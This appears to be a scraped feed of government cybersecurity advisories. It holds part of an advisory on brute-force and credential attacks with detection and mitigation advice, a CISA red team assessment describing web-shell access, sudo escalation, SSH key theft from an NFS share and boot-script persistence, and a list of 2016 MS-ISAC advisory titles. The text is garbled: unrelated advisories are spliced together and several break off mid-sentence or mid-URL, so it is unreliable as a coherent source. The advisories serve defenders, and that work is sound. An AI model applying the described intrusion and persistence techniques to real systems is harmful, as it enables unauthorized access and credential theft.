<code>}</code><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <code>Write-host Total servers: $i</code></p> <h3><strong>Command and Control</strong></h3> <p>On one occasion, using&nbsp;msedge.exe, the actors likely made outbound connections to Cobalt Strike Beacon command and control (C2) infrastructure [<a href="https://attack.mitre.org/versions/v15/techniques/T1071/001/" title="Application Layer Protocol: Web Protocols">T1071.001</a>].</p> <h3><strong>Exfiltration and Collection</strong></h3> <p>In a couple instances, while logged in to victim accounts, the actors downloaded files related to gaining remote access to the organization and to the organization’s inventory [<a href="https://attack.mitre.org/techniques/T1005/" title="Data from Local System">T1005</a>], likely exfiltrating the files to further persist in the victim network or to sell the information online.</p> <h2><strong>Detection</strong></h2> <p>To detect brute force activity, the authoring agencies recommend reviewing authentication logs for system and application login failures of valid accounts and looking for multiple, failed authentication attempts across all accounts.</p> <p>To detect the use of compromised credentials in combination with virtual infrastructure, the authoring agencies recommend the following steps:</p> <ul> <li>Look for “impossible logins,” such as suspicious logins with changing usernames, user agent strings, and IP address combinations or logins where IP addresses do not align to the user’s expected geographic location.</li> <li>Look for one IP used for multiple accounts, excluding expected logins.</li> <li>Look for “impossible travel.” Impossible travel occurs when a user logs in from multiple IP addresses with significant geographic distance (i.e., a person could not realistically travel between the geographic locations of the two IP addresses during the period between the logins). <strong>Note:</strong> Implementing this detection opportunity can result in false positives if legitimate users apply VPN solutions before connecting into networks.</li> <li>Look for MFA registrations with MFA in unexpected locales or from unfamiliar devices.</li> <li>Look for processes and program execution command-line arguments that may indicate credential dumping, especially attempts to access or copy the&nbsp;<code>ntds.dit</code> file from a domain controller.</li> <li>Look for suspicious privileged account use after resetting passwords or applying user account mitigations.</li> <li>Look for unusual activity in typically dormant accounts.</li> <li>Look for unusual user agent strings, such as strings not typically associated with normal user activity, which may indicate bot activity.</li> </ul> <h2><strong>Mitigations</strong></h2> <p>The authoring agencies recommend organizations implement the mitigations below to improve organizations’ cybersecurity posture based on the actors’ TTPs described in this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA. The CPGs, which are organized to align to the National Institute of Standards and Technology (NIST) Cybersecurity Framework, are a subset of cybersecurity practices, aimed at meaningfully reducing risks to both critical infrastructure operations and the American people. These voluntary CPGs strive to help small- and medium-sized organizations kick-start their cybersecurity efforts by prioritizing investment in a limited number of essential actions with high-impact security outcomes. Visit CISA’s&nbsp;<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a> for more information on the CPGs, including additional recommended baseline protections.</p> <ul> <li>Review IT helpdesk password management related to initial passwords, password resets for user lockouts, and shared accounts. IT helpdesk password procedures may not align to company policy for user verification or password strength, creating a security gap. Avoid common passwords (e.g. “Spring2024” or “Password123!”).</li> <li>Disable user accounts and access to organizational resources for departing staff [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#RevokingCredentialsforDepartingEmployees2D" title="Cross-Sector Cybersecurity Performance Goals">CPG 2.D</a>]. Disabling accounts can minimize system exposure, removing options actors can leverage for entry into the system. Similarly, create new user accounts as close as possible to an employee’s start date.</li> <li>Implement phishing-resistant MFA [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#PhishingResistantMultifactorAuthenticationMFA2H" title="Cross-Sector Cybersecurity Performance Goals">CPG 2.H</a>]. See CISA’s resources&nbsp;<a href="https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf" title="Implementing Phishing-Resistant MFA">Phishing-Resistant Multifactor Authentication</a>&nbsp;and&nbsp;<a href="https://www.cisa.gov/MFA" title="More than a Password">More than a Password</a> for additional information on strengthening user credentials.</li> <li>Continuously review MFA settings to ensure coverage over all active, internet-facing protocols to ensure no exploitable services are exposed [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goal Enhancing Cyber Resilience: Insights from CISA Red Team Assessment of a US Critical Infrastructure Sector Organization https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-326a US-CERT Alerts urn:uuid:be3e9819-7b3b-0f9c-d5e0-5c28578069a7 Fri, 02 Aug 2024 17:17:08 +0000 <h2><strong>EXECUTIVE SUMMARY</strong></h2> <p>The Cybersecurity and Infrastructure Security Agency (CISA) conducted a red team assessment (RTA) at the request of a critical infrastructure organization. During RTAs, CISA’s red team simulates real-world malicious cyber operations to assess an organization’s cybersecurity detection and response capabilities. In coordination with the assessed organization, CISA is releasing this Cybersecurity Advisory to detail the red team’s activity—including their tactics, techniques, and procedures (TTPs) and associated network defense activity. Additionally, the advisory contains lessons learned and key findings from the assessment to provide recommendations to network defenders and software manufacturers for improving their organizations’ and customers’ cybersecurity posture.</p> <p>Within this assessment, the red team (also referred to as ‘the team’) gained initial access through a web shell left from a third party’s previous security assessment. The red team proceeded to move through the demilitarized zone (DMZ) and into the network to fully compromise the organization’s domain and several sensitive business system (SBS) targets. The assessed organization discovered evidence of the red team’s initial activity but failed to act promptly regarding the malicious network traffic through its DMZ or challenge much of the red team’s presence in the organization’s Windows environment.</p> <p>The red team was able to compromise the domain and SBSs of the organization as it lacked sufficient controls to detect and respond to their activities. The red team’s findings illuminate lessons learned for network defenders and software manufacturers about how to respond to and reduce risk.</p> <ul> <li><strong>Lesson Learned: The assessed organization had insufficient technical controls to prevent and detect malicious activity.</strong> The organization relied too heavily on host-based endpoint detection and response (EDR) solutions and did not implement sufficient network layer protections.</li> <li><strong>Lesson Learned: The organization’s staff require continuous training, support, and resources to implement secure software configurations and detect malicious activity.</strong> Staff need to continuously enhance their technical competency, gain additional institutional knowledge of their systems, and ensure they are provided sufficient resources by management to have the conditions to succeed in protecting their networks.</li> <li><strong>Lesson Learned: The organization’s leadership minimized the business risk of known attack vectors for the organization.</strong> Leadership deprioritized the treatment of a vulnerability their own cybersecurity team identified, and in their risk-based decision-making, miscalculated the potential impact and likelihood of its exploitation.</li> </ul> <p>To reduce risk of similar malicious cyber activity, CISA encourages critical infrastructure organizations to apply the recommendations in the <strong>Mitigations</strong> section of this advisory to ensure security processes and procedures are up to date, effective, and enable timely detection and mitigation of malicious activity.</p> <p>This document illustrates the outsized burden and costs of compensating for insecure software and hardware borne by critical infrastructure owners and operators. The expectation that owners and operators should maintain the requisite sophisticated cyber defense skills creates undue risk. Technology manufacturers must assume responsibility for product security. Recognizing that insecure software contributes to these identified issues, CISA urges software manufacturers to embrace <a href="https://www.cisa.gov/securebydesign">Secure by Design</a> principles and implement the recommendations in the Mitigations section of this advisory, including those listed below:</p> <ul> <li><strong>Embed security into product architecture throughout the entire software development lifecycle&nbsp;</strong>(SDLC).</li> <li><strong>Eliminate default passwords</strong>.</li> <li><strong>Mandate MFA</strong>, ideally phishing-resistant MFA, for privileged users and make MFA a default, rather than opt-in, feature.</li> </ul> <p>Download the PDF version of this report:</p> <div class="c-file"> <div class="c-file__download"> <a href="/sites/default/files/2024-11/aa24-326a-enhancing-cyber-resilience-insights-from-cisa-red-team-assessment_0.pdf" class="c-file__link" target="_blank">AA24-326A Enhancing Cyber Resilience: Insights from CISA Red Team Assessment of a U.S. Critical Infrastructure Sector Organization</a> <span class="c-file__size">(PDF, 823.56 KB )</span> </div> </div> <h2><strong>INTRODUCTION</strong></h2> <p>CISA has authority to—upon request—provide analyses, expertise, and other technical assistance to critical infrastructure owners and operators and provide operational and timely technical assistance to federal and non-federal entities with respect to cybersecurity risks. (See generally 6 U.S.C. §§ 652[c][5], 659[c][6]). The target organization for this assessment was a critical infrastructure organization in the United States. After receiving a request for an RTA from the organization and coordinating the high-level details of the engagement, CISA conducted the RTA over approximately a three-month period.</p> <p>During RTAs, a CISA red team simulates real-world threat actors to assess an organization’s cybersecurity detection and response capabilities. During Phase I, the red team attempts to gain and maintain persistent access to an organization’s enterprise network, avoid detection, evade defenses, and access SBSs. During Phase II, the red team attempts to trigger a security response from the organization’s people, processes, and/or technology.</p> <p>Drafted in coordination with the assessed organization, this advisory details the red team’s activity and TTPs, associated network defense activity, and lessons learned to provide network defenders with recommendations for improving an organization’s cybersecurity posture. The advisory also provides recommendations for software manufacturers to harden their customer networks against malicious activity and reduce the likelihood of domain compromise.</p> <h2><strong>TECHNICAL DETAILS</strong></h2> <p><strong>Note:</strong>&nbsp;This advisory uses the <a href="https://attack.mitre.org/versions/v16/matrices/enterprise/">MITRE ATT&amp;CK<sup>®</sup></a><a href="https://attack.mitre.org/versions/v16/matrices/enterprise/" title="Enterprise Matrix"> Matrix for Enterprise</a> framework, version 16. See Appendix: MITRE ATT&amp;CK Tactics and Techniques for a table of the red team’s activity mapped to MITRE ATT&amp;CK tactics and techniques.</p> <h3>Phase I: Red Team Cyber Threat Activity</h3> <h4><strong>Overview</strong></h4> <p>The CISA red team operated without prior knowledge of the organization’s technology assets and began the assessment by conducting open source research on the target organization to gain information about its network [<a href="https://attack.mitre.org/versions/v16/techniques/T1590/">T1590</a>], defensive tools [<a href="https://attack.mitre.org/versions/v16/techniques/T1590/006/">T1590.006</a>], and employees [<a href="https://attack.mitre.org/versions/v16/techniques/T1589/003/">T1589.003</a>]. The red team designed spearphishing campaigns [<a href="https://attack.mitre.org/versions/v16/techniques/T1566/">T1566</a>] tailored to employees most likely to communicate with external parties. The phishing attempts were ultimately unsuccessful—targets ran the payloads [<a href="https://attack.mitre.org/versions/v16/techniques/T1204/">T1204</a>], but their execution did not result in the red team gaining access into the network.</p> <p>After the failed spearphishing campaigns, the red team continued external reconnaissance of the network [<a href="https://attack.mitre.org/versions/v16/techniques/T1595/">T1595</a>] and discovered a web shell [<a href="https://attack.mitre.org/versions/v16/techniques/T1505/003/">T1505.003</a>] left from a previous Vulnerability Disclosure Program (VDP). The red team used this for initial access [<a href="https://attack.mitre.org/versions/v16/tactics/TA0001/">TA0001</a>] and immediately reported it to the organization’s trusted agents (TAs). The red team leveraged that access to escalate privileges [<a href="https://attack.mitre.org/versions/v16/tactics/TA0004/">TA0004</a>] on the host, discover credential material on a misconfigured Network File System (NFS) share [<a href="https://attack.mitre.org/versions/v16/techniques/T1552/001/">T1552.001</a>], and move from a DMZ to the internal network [<a href="https://attack.mitre.org/versions/v16/tactics/TA0008/">TA0008</a>].</p> <p>With access to the internal network, the red team gained further access to several SBSs. The red team leveraged a certificate for client authentication [<a href="https://attack.mitre.org/versions/v16/techniques/T1649/">T1649</a>] they discovered on the NFS share to compromise a system configured for Unconstrained Delegation. This allowed the red team to acquire a ticket granting ticket (TGT) for a domain controller [<a href="https://attack.mitre.org/versions/v16/techniques/T1558/001">T1558.001</a>], used to further compromise the domain. The red team leveraged this level of access to exploit SBS targets provided by the organization’s TAs.</p> <p>The assessed organization detected much of the red team’s activity in their Linux infrastructure after CISA alerted them via other channels to the vulnerability the red team used for initial access. Once given an official notification of a vulnerability, the organization’s network defenders began mitigating the vulnerability. Network defenders removed the site hosting the web shell from the public internet but did not take the server itself offline. A week later, network defenders officially declared an incident once they determined the web shell was used to breach the internal network. For several weeks, network defenders terminated much of the red team’s access until the team maintained implants on only four hosts. Network defenders successfully delayed the red team from accessing many SBSs that required additional positioning, forcing the red team to spend time refortifying their access in the network. Despite these actions, the red team was still able to access a subset of SBSs. Eventually, the red team and TAs decided that the network defenders would stand down to allow the red team to continue its operations in a monitoring mode. In monitoring mode, network defenders would report what they observed of the red team’s access, but not continue to block and terminate it.</p> <p>See <strong>Figure 1</strong> for a timeline of the red team’s activity with key points access. See the following sections for additional details, including the red team’s TTPs.</p> <figure class="c-figure c-figure--image" role="group"> <div class="c-figure__media"> <img loading="lazy" src="/sites/default/files/styles/large/public/2024-11/Figure%201%20-%20Timeline%20of%20Red%20Team%20Activity%20%28CI%29.png?itok=nzy7agO2" width="1024" height="567" alt="Figure 1 - Timeline of Red Team Activity (CI)"> </div> <figcaption class="c-figure__caption"><em>Figure 1: Timeline of Red Team Cyber Threat Activity</em></figcaption> </figure> <h4><strong>Initial Access</strong></h4> <p>Following an unsuccessful spearphishing campaign, the red team gained initial access to the target by exploiting an internet-facing Linux web server [<a href="https://attack.mitre.org/versions/v15/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a>] discovered through reconnaissance [<a href="https://attack.mitre.org/versions/v15/tactics/TA0043/" title="Reconnaissance">TA0043</a>] of the organization’s external internet protocol (IP) space [<a href="https://attack.mitre.org/versions/v15/techniques/T1590/005/" title="Gather Victim Network Information: IP Addresses">T1590.005</a>].</p> <p>The red team first conducted open source research [<a href="https://attack.mitre.org/versions/v15/techniques/T1593/" title="Search Open Websites/Domains">T1593</a>] to identify information about the organization’s network including the tools used to protect the network and potential targets for spearphishing. The red team looked for email addresses [<a href="https://attack.mitre.org/versions/v15/techniques/T1589/002/" title="Gather Victim Identity Information: Email Addresses">T1589.002</a>] and names to infer email addresses from the organization’s email syntax (discovered during reconnaissance). Following, the red team sent tailored spearphishing emails to 13 targets [<a href="https://attack.mitre.org/versions/v15/techniques/T1566/002/" title="Phishing: Spearphishing Link">T1566.002</a>]. Of these 13 targets, one user responded and executed two malicious payloads [<a href="https://attack.mitre.org/versions/v15/techniques/T1204/002/" title="User Execution: Malicious File">T1204.002</a>]. However, the payloads failed to bypass a previously undiscovered technical control employed by the victim organization, which prevented the red team’s first attempt to gain initial access.</p> <p>To find an alternate pathway for initial access, the red team conducted reconnaissance with several publicly available tools, such as <a href="https://www.shodan.io/">Shodan</a> and <a href="https://search.censys.io/">Censys</a>, to discover accessible devices and services on the internet [<a href="https://attack.mitre.org/versions/v15/techniques/T1596/005/" title="Search Open Technical Databases: Scan Databases">T1596.005</a>]. The red team identified an old and unpatched service with a known XML External Entity (XXE) vulnerability and leveraged a public proof of concept to deploy a web shell. The associated product had an exposed endpoint—one that system administrators should typically block from the public internet—that allowed the red team to discover a preexisting web shell on the organization’s Linux web server. The preexisting web shell allowed the red team to run arbitrary commands on the server [<a href="https://attack.mitre.org/versions/v15/techniques/T1059/" title="Command and Scripting Interpreter">T1059</a>] as a user (WEBUSER1). Using the web shell, the red team identified an open internal proxy server [<a href="https://attack.mitre.org/versions/v15/techniques/T1016/" title="System Network Configuration Discovery">T1016</a>] to send outbound communications to the internet via Hypertext Transfer Protocol Secure (HTTPS). The red team then downloaded [<a href="https://attack.mitre.org/versions/v15/techniques/T1105/" title="Ingress Tool Transfer">T1105</a>] and executed a&nbsp;<a href="https://attack.mitre.org/versions/v14/software/S0633/">Sliver</a> payload that utilized this proxy to establish command and control (C2) over this host, calling back to their infrastructure [<a href="https://attack.mitre.org/versions/v15/tactics/TA0011/" title="Command and Control">TA0011</a>].</p> <p><strong>Note: </strong>Because the web shell and unpatched vulnerability allowed actors to easily gain initial access to the organization, the CISA red team determined this was a critical vulnerability. CISA reported both the vulnerability and the web shell to the organization in an official vulnerability notification so the organization could remediate both issues. Following this notification, the victim organization initiated threat hunting activities, detecting some of the red team’s activity. The TAs determined that network defenders had previously identified and reported the vulnerability but did not remediate it. Further, the TAs found that network defenders were unaware of the web shell and believed it was likely leftover from prior VDP activity. See the <strong>Defense Evasion and Victim Network Defense Activities</strong> section for more information.</p> <h4><strong>Linux Infrastructure Compromise</strong></h4> <h5><em>Local Privilege Escalation and Credential Access</em></h5> <p>The red team then moved laterally from the web server to the organization’s internal network using valid accounts [<a href="https://attack.mitre.org/versions/v16/techniques/T1078/">T1078</a>] as the DMZ was not properly segmented from the organization’s internal domain.</p> <p>The red team acquired credentials [<a href="https://attack.mitre.org/versions/v16/tactics/TA0006/">TA0006</a>] by first escalating privileges on the web server. The team discovered that WEBUSER1 had excessive <code>sudo</code> rights, allowing them to run some commands as root commands without a password. They used these elevated rights to deploy a new callback with root access [<a href="https://attack.mitre.org/versions/v16/techniques/T1548/003/">T1548.003</a>].</p> <p>With root access to the web server, the team had full access to the organization’s directories and files on a NFS share with <code>no_root_squash</code> enabled. If <code>no_root_squash</code> is used, remote root users can read and change any file on the shared file system and leave a trojan horse [<a href="https://attack.mitre.org/versions/v16/techniques/T1080/">T1080</a>] for other users to inadvertently execute. On Linux operating systems this option is disabled by default, yet the organization enabled it to accommodate several legacy systems. The organization’s decision to enable the <code>no_root_squash</code> option allowed the red team to read all the files on the NFS share once it escalated its privileges on a single host with the NFS share mounted. This NFS share hosted the home directories of hundreds of Linux users—many of which had privileged access to one or more servers—and was auto-mounted when those users logged into Linux hosts in the environment.</p> <p>The red team used its escalated privileges to search for private certificate files, Secure Shell (SSH) private keys, passwords, bash command histories [<a href="https://attack.mitre.org/versions/v16/techniques/T1552/003/">T1552.003</a>], and other sensitive data across all user files on the NFS share [<a href="https://attack.mitre.org/versions/v16/techniques/T1039/">T1039</a>]. The team initially obtained 61 private SSH keys [<a href="https://attack.mitre.org/versions/v16/techniques/T1552/004/">T1552.004</a>] and a file containing valid cleartext domain credentials (DOMAINUSER1) that the team used to authenticate to the organization’s domain [<a href="https://attack.mitre.org/versions/v16/techniques/T1078/002/">T1078.002</a>].</p> <h5><em><strong>Linux Command and Control</strong></em></h5> <p>In the organization’s Linux environment, the red team leveraged HTTPS connections for C2 [<a href="https://attack.mitre.org/versions/v15/techniques/T1071/001/" title="Application Layer Protocol: Web Protocols">T1071.001</a>]. Most of the Linux systems could not directly access the internet, but the red team circumvented this by leveraging an open internal HTTPS proxy [<a href="https://attack.mitre.org/versions/v15/techniques/T1090/001/" title="Proxy: Internal Proxy">T1090.001</a>] for their traffic.</p> <h5><em><strong>Lateral Movement and Persistence</strong></em></h5> <p>The red team’s acquisition of SSH private keys generated for user and service accounts facilitated unrestricted lateral movement to other Linux hosts [<a href="https://attack.mitre.org/versions/v16/techniques/T1021/004/">T1021.004</a>]. This acquisition included two highly privileged accounts with root access to hundreds of servers. Within one week of initial access, the team moved to multiple Linux servers and established persistence [<a href="https://attack.mitre.org/versions/v16/tactics/TA0003/">TA0003</a>] on four. The team used a different persistence mechanism on each Linux host, so network defenders would be less likely to discover the red team’s presence on all four hosts. The team temporarily backdoored several scripts run at boot time to maintain persistence [<a href="https://attack.mitre.org/versions/v16/techniques/T1037/">T1037</a>], ensuring the original versions of the scripts were re-enabled once the team successfully achieved persistence. Some of the team’s techniques included modifying preexisting scripts run by the <code>cron</code> utility [<a href="https://attack.mitre.org/versions/v16/techniques/T1053/003/">T1053.003</a>] and <code>ifup-post</code> scripts [<a href="https://attack.mitre.org/versions/v16/techniques/T1037/003/">T1037.003</a>].</p> <p>Of note, the team gained root access to an SBS-adjacent infrastructure management server that ran Ansible Tower. Access to this Ansible Tower system [<a href="https://attack.mitre.org/versions/v16/techniques/T1072/">T1072</a>] provided easy access to multiple SBSs. The team discovered a root SSH private key on the host, which allowed the team to move to six SBSs across six different sensitive IP ranges. A week after the team provided screenshots of root access to the SBSs to the TAs, the TAs deconflicted the red team’s access to the Ansible Tower system that network defenders discovered. The organization detected the compromise by observing abnormal usage of the root SSH private key. The root SSH private key was used to log into multiple hosts at times and for durations outside of preestablished baselines. In a real compromise, the organization would have had to shut down the server, significantly impacting business operations.</p> <h4><strong>Windows Domain Controller Compromise</strong></h4> <p>Approximately two weeks after gaining initial access, the red team compromised a Windows domain controller. This compromise allowed the team to move laterally to all domain-joined Windows hosts within the organization.</p> <p>To first gain situational awareness about the organization’s environment, the red team exfiltrated Activ Multiple Vulnerabilities in Mozilla Firefox Could Allow for Arbitrary Code Execution https://msisac.cisecurity.org/advisories/2016/2016-018.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:9adc2502-066a-b6aa-e508-9840b8ba6c85 Wed, 27 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Magento eCommerce Platform Could Allow Remote Code Execution https://msisac.cisecurity.org/advisories/2016/2016-019.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:958cbee4-52f7-6b2f-3e15-f83880b92e79 Tue, 26 Jan 2016 05:00:00 +0000 ... Vulnerability in AMX Harman Professional Devices Could Allow Unauthorized Remote Access https://msisac.cisecurity.org/advisories/2016/2016-017.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:df326835-82de-bc7c-ff12-7aca82a6d1d5 Mon, 25 Jan 2016 05:00:00 +0000 ... Vulnerability in Fortinet FortiOS Could Allow Unauthorized Remote Access https://msisac.cisecurity.org/advisories/2016/2015-012-2.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:f1627017-2426-80ad-1b8a-8fcca8ad5ac5 Mon, 25 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Google Chrome Could Allow for Arbitrary Code Execution https://msisac.cisecurity.org/advisories/2016/2016-016.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:cdee89e3-ccf6-2ea1-99c4-4a1d0280813e Thu, 21 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in PHP Could Allow Arbitrary Code Execution https://msisac.cisecurity.org/advisories/2016/2016-002-02.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:e474be2e-4618-0cc3-405f-0bd925e22bdc Thu, 21 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Apple Products Could Allow Arbitrary Code Execution https://msisac.cisecurity.org/advisories/2016/2016-015.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:cd46607a-140e-6d66-5a28-0acea3e2cc04 Wed, 20 Jan 2016 05:00:00 +0000 ... Oracle Quarterly Critical Patches Issued January 19, 2016 https://msisac.cisecurity.org/advisories/2016/2016-014.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:1da62e6c-b577-79df-dc31-058bec3983eb Tue, 19 Jan 2016 05:00:00 +0000 ... Vulnerability in Microsoft Silverlight Could Allow Remote Code Execution (MS16-006) https://msisac.cisecurity.org/advisories/2016/2016-009-2.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:da2a0033-2f85-ab84-921a-4e3f4123e051 Fri, 15 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Cisco Products Could Allow for Unauthenticated, Remote Access https://msisac.cisecurity.org/advisories/2016/2016-013.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:7afa4e01-a127-8143-8aa9-4dce35f24fd1 Thu, 14 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (MS16-004) https://msisac.cisecurity.org/advisories/2016/2016-007.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:51c36ca0-030f-defe-e111-0b486577e9d2 Tue, 12 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Adobe Acrobat and Adobe Reader Could Allow for Remote Code Execution (APSB16-02) https://msisac.cisecurity.org/advisories/2016/2016-011.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:131cc697-e5a0-4bf2-04b6-f40209cf74b1 Tue, 12 Jan 2016 05:00:00 +0000 ... Vulnerabilities in Microsoft Windows Could Allow Remote Code Execution (MS16-007) https://msisac.cisecurity.org/advisories/2016/2016-010.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:c7647d08-16a3-ec5d-881f-ae8abf2167db Tue, 12 Jan 2016 05:00:00 +0000 ... Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (MS16-005) https://msisac.cisecurity.org/advisories/2016/2016-008.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:e9b1eb09-49bb-6a0c-ea78-e04c091bd2e2 Tue, 12 Jan 2016 05:00:00 +0000 ... A Vulnerability in VBScript Scripting Engine Could Allow for Remote Code Execution (MS16-003) https://msisac.cisecurity.org/advisories/2016/2016-006.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:093cf3fe-3347-432a-f2e9-7aa1a18445ef Tue, 12 Jan 2016 05:00:00 +0000 ... Cumulative Security Update for Microsoft Edge (MS16-002) https://msisac.cisecurity.org/advisories/2016/2016-005.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:aca4c6fc-44b6-fbb5-324b-7762cfb02297 Tue, 12 Jan 2016 05:00:00 +0000 ... Cumulative Security Update for Internet Explorer (MS16-001) https://msisac.cisecurity.org/advisories/2016/2016-004.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:4af1b3f3-9d0c-9c87-aa9e-201423fa8450 Tue, 12 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Apple QuickTime Could Allow Arbitrary Code Execution https://msisac.cisecurity.org/advisories/2016/2015-003.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:1594dfb7-e178-038d-bf44-d91483df581e Fri, 08 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Google Android Could Allow for Remote Code Execution https://msisac.cisecurity.org/advisories/2016/2016-001.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:49fa7472-6ff5-7a0d-1ff9-6fd8f94f62f6 Tue, 05 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Adobe Flash Player and AIR Could Allow Remote Code Execution (APSB16-01) https://msisac.cisecurity.org/advisories/2015/2015-157.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:d49b87c4-d723-ce3e-a211-f26077bb8187 Mon, 28 Dec 2015 05:00:00 +0000 ... Multiple vulnerabilities in Joomla Could Allow Arbitrary Code Execution https://msisac.cisecurity.org/advisories/2015/2015-155.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:aca4a417-9d66-39d7-7efd-10c3ed81f140 Wed, 23 Dec 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Juniper ScreenOS Could Allow Unauthorized, Remote Access or Remote Code Execution https://msisac.cisecurity.org/advisories/2015/2015-154-2.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:bee3b333-ea1a-ad4a-b7d3-1e06c4959e78 Tue, 22 Dec 2015 05:00:00 +0000 ... Vulnerability in Apache Commons Collections Could Allow Arbitrary Code Execution https://msisac.cisecurity.org/advisories/2015/2015-152-2.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:84ba94da-2704-9bbe-ee33-aa132a32d4d8 Tue, 22 Dec 2015 05:00:00 +0000 ... Vulnerability in FireEye Products Could Allow for Remote Code Execution https://msisac.cisecurity.org/advisories/2015/2015-153.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:127c9edd-8a9d-021c-bc3b-7ad69717407f Thu, 17 Dec 2015 05:00:00 +0000 ... Vulnerability in Joomla Could Allow Remote Code Execution https://msisac.cisecurity.org/advisories/2015/2015-150.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:1cdb6f41-30e6-a393-6bcb-ea02c79ae702 Tue, 15 Dec 2015 05:00:00 +0000 ... Vulnerability in Cisco Products Could Allow Remote Code Execution https://msisac.cisecurity.org/advisories/2015/2015-149.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:9b7442ff-0a3c-26e8-35b3-e24e9c321591 Tue, 15 Dec 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Apple Products Could Allow Remote Code Execution https://msisac.cisecurity.org/advisories/2015/2015-147.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:8431c24a-cf5e-bb59-d1aa-b39f6087f11d Tue, 08 Dec 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Adobe Flash Player Could Allow Remote Code Execution (APSB15-32) https://msisac.cisecurity.org/advisories/2015/2015-146.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:67aec496-0d3c-7263-65ba-d32bb9253606 Tue, 08 Dec 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Windows Media Center Could Allow Remote Code Execution (MS15-134) https://msisac.cisecurity.org/advisories/2015/2015-145.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:32b25e4a-a95f-dfca-83b9-53a5e0f20cf1 Tue, 08 Dec 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (MS15-131) https://msisac.cisecurity.org/advisories/2015/2015-144.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:49ed1022-532f-1a03-a853-a5c1ea94458a Tue, 08 Dec 2015 05:00:00 +0000 ... Vulnerability in Microsoft Uniscribe Could Allow Remote Code Execution (MS15-130) https://msisac.cisecurity.org/advisories/2015/2015-143.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:6a960434-2082-adb7-41c6-33f14d006b55 Tue, 08 Dec 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Microsoft Silverlight Could Allow Remote Code Execution (MS15-129) https://msisac.cisecurity.org/advisories/2015/2015-142.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:79080def-5f33-f1c8-e06f-1d5a067c930c Tue, 08 Dec 2015 05:00:00 +0000 ... Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (MS15-128) https://msisac.cisecurity.org/advisories/2015/2015-141.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:0ba6dee7-37ab-49c8-16be-c662fd0d5f18 Tue, 08 Dec 2015 05:00:00 +0000 ... Vulnerability in Microsoft DNS Server Could Allow Remote Code Execution (MS15-127) 